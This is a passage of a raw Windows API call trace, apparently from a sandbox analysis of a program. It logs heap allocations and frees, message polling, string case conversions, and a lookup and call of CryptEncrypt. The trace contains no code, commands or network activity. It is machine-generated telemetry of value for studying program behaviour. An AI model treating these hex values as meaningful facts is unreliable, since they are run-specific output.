returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0262.396] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.398] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.398] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0262.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0262.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0262.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.399] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.399] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.399] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0262.400] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.400] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a96d8 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0262.400] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0262.400] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.401] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.401] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.401] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.401] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0262.402] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.402] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.403] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.404] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.405] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.406] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.407] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.408] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.409] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0262.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa050, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.410] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0262.410] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2160 | out: hHeap=0x25c0000) returned 1 [0262.411] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0262.411] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x13626, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x13628) returned 1 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2160 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.411] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.412] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.412] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.413] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.413] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: 